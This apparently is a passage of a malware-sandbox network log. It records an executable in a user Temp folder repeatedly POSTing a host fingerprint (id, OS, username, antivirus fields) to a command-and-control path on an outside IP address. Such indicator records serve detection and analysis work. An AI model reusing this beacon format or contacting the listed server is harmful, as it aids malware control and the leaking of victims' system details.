                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.124161005 CET | 526 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            338 | 192.168.2.4 | 50033 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:04.293934107 CET | 527 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.360657930 CET | 527 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            339 | 192.168.2.4 | 50034 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:04.545459032 CET | 528 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.609428883 CET | 528 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            34 | 192.168.2.4 | 49729 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:35.078277111 CET | 223 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.144102097 CET | 223 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            340 | 192.168.2.4 | 50035 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:04.790431976 CET | 529 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:04.855072975 CET | 529 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:04 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            341 | 192.168.2.4 | 50036 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:05.033129930 CET | 530 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.098758936 CET | 530 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            342 | 192.168.2.4 | 50037 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:05.274550915 CET | 530 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.338116884 CET | 531 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            343 | 192.168.2.4 | 50038 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:05.523813009 CET | 532 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.587480068 CET | 532 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            344 | 192.168.2.4 | 50039 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:05.758232117 CET | 533 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:05.820897102 CET | 533 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            345 | 192.168.2.4 | 50040 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:05.994782925 CET | 534 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.061028004 CET | 534 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            346 | 192.168.2.4 | 50041 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:06.234294891 CET | 535 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.303630114 CET | 535 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            347 | 192.168.2.4 | 50042 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:06.484997034 CET | 536 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.547944069 CET | 536 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            348 | 192.168.2.4 | 50043 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:06.727732897 CET | 537 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:06.790538073 CET | 537 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            349 | 192.168.2.4 | 50044 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:06.968442917 CET | 538 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.031526089 CET | 538 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            35 | 192.168.2.4 | 49730 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:35.325342894 CET | 224 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:35.389950037 CET | 224 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            350 | 192.168.2.4 | 50045 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:07.221259117 CET | 539 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.287579060 CET | 539 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            351 | 192.168.2.4 | 50046 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:07.465500116 CET | 540 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.531687021 CET | 540 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            352 | 192.168.2.4 | 50047 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:07.710715055 CET | 540 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:07.773403883 CET | 541 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            353 | 192.168.2.4 | 50048 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:07.945990086 CET | 542 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.009577036 CET | 542 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            354 | 192.168.2.4 | 50049 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:08.183039904 CET | 543 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.248380899 CET | 543 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            355 | 192.168.2.4 | 50050 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:08.417524099 CET | 544 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:08.483331919 CET | 544 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
